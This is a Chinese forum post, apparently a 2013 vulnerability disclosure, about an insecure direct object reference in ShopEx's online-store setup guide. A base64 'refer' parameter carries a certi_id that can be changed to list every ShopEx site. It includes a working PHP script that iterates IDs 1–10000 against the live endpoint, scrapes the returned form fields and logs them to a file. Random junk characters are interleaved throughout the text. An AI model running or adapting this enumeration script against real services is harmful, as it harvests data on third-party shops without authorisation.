|
|
简要描述:2 X) w Z) Y+ P2 P) k( ?% g0 O
ShopEx某接口缺陷,可遍历所有网站# a$ J! N+ g5 i8 |0 ~! @( X X' v
详细说明:
/ G/ b0 q; j/ k& l7 w$ {问题出现在shopex 网店使用向导页面 ! G* o0 |0 a2 c, M; s
' G$ L' j1 }6 m$ r/ C6 b
' f. i$ j1 [: s. ~: f/ j5 e
, Y4 E, w3 l( d9 U+ }, U$ Whttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=' k8 | w( i! k9 l8 R. ]( P
# m3 B4 ~; ~3 t( d7 r% b
3 H. w+ y _6 W( E0 B, e4 {: r0 d) N3 J3 |2 F2 r- x
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}6 ]' g% [7 z2 E8 M2 b2 m9 v0 d9 @
. k$ t& |, h, ]" b5 @
4 V8 y* R/ {' E' b* i7 D- P: o. i0 Z$ E- U" P+ G, S$ ^
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
. @* R& @, V/ O
+ w# a. ~1 y9 z3 G7 ?. O. A( s- h: Q' U) }
) M/ N+ M% U) m+ x& J" V<?php& v: O7 ~& r" w
! `& l: p0 h5 n$ o( z for ($i=1; $i < 10000; $i++) { //遍历: u* i% B; |* P
# L$ w8 b7 G$ a$ ]
ShowshopExD($i);& n; n8 a, Q& T7 y6 I. L
5 x [2 L: _! U
}
- W! e( w5 L5 ]1 S
9 M4 x/ T2 [; Z. ` function ShowshopExD($cid) {
( a# E$ I: r3 @. B
' [/ v0 B/ w) m1 {' v4 ^# n3 f $url='http://guide.ecos.shopex.cn/step2.php';" \( C/ J7 S. O
% O0 Z$ \) @0 g) n9 e $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
4 G" i4 t1 @/ x" |( q8 \6 l2 P
8 |, j) x9 v$ g& s# ] $url = $url.'?refer='.$refer;9 x' w5 d( t3 C: n8 K
2 k$ a1 V) [9 _% @8 `7 s
$ch = curl_init($url);, i2 K/ j0 U. W7 L
) {/ t& o$ K# j: _
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;) H T6 c5 P0 i; u' P
4 U% n- W# \! x. i0 \& Y. \7 T
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;: l7 W8 |' |6 G- R4 U
# _: e* s: k- X( W7 D9 Z! j
$result = curl_exec($ch);5 a3 c1 |8 N ?! N$ {
4 c9 t$ q% e) e' X$ M" i, m $result = mb_convert_encoding($result, "gb2312", "UTF-8");
" ]% j2 C5 u/ k8 Q9 H8 {# v( u3 m2 g+ x9 O+ H6 N7 p. J
if(strpos($result,$refer)). l2 M( V3 H2 T+ g
' ?" y/ i3 D0 ]/ F# V
{
' u! e3 b& Y6 s1 e
, ^5 P; K- F3 Y% \9 X. Y7 _ $fp = fopen("c:/shopEx.txt",'ab'); //保存文件( _3 a) |# }( `
8 t5 X1 B7 d! z# {2 z preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);3 Y7 x, K& j/ W
" f) s% e% |+ ?' N& y4 C' h+ c8 h- s foreach ($value[1] as $key) {* T+ w: j- Y' L/ W$ Q
( n; c/ J1 M' [0 Q preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);( K7 w/ |' g! J7 _) R. C
5 H; O+ m. e9 Y, z5 A+ [* b
echo $res[1][0].':'.$res[3][0]."\r\n";, g) E0 h# d; G+ d9 b
4 T- ^1 _$ _: b. J2 @ $col =$res[1][0].':'.$res[3][0]."\r\n"; 7 f+ R0 X* U' C. Y G; }( u
6 B% x7 V$ n) r& y4 g fwrite($fp, $col, strlen($col)); & f1 d% S+ ]0 s
- N( g2 Z* ]5 P" F
}
/ N5 X4 `; w ^) x& j3 i& j0 a, h8 v4 ?2 o% Z( h% Q
echo '--------------------------------'."\r\n";: w: p8 h* p6 a' |% `7 T& b( H8 h8 b
. \0 D3 y, M/ ~ fclose($fp);
+ ~0 [& b- d/ w! J( {- t+ y( }" [1 I. ^
}
( S' q/ L9 J! ~1 y7 Y8 Q) R' b7 |1 T/ Z/ r' B% r
flush();& q5 }) F- ]- _* D1 n. S& q9 C5 k
) g7 x4 D9 K; U8 h1 \+ F- [' L curl_close($ch);
5 v$ p( Z+ ?6 k, L l$ O" r
3 K: T2 v/ d9 B% @; `' @ }; r8 g) B+ c: ~
2 g( }; Z ^* l( O- J4 T3 B?>0 _" l+ y- p2 i9 [1 c
漏洞证明:
1 u+ @: l7 z* t" E1 ~, B. hhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg8 q, l, `4 M7 `6 l* w1 W
refer换成其他加密方式
7 D* ?' b0 Z% L0 N9 t' I |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对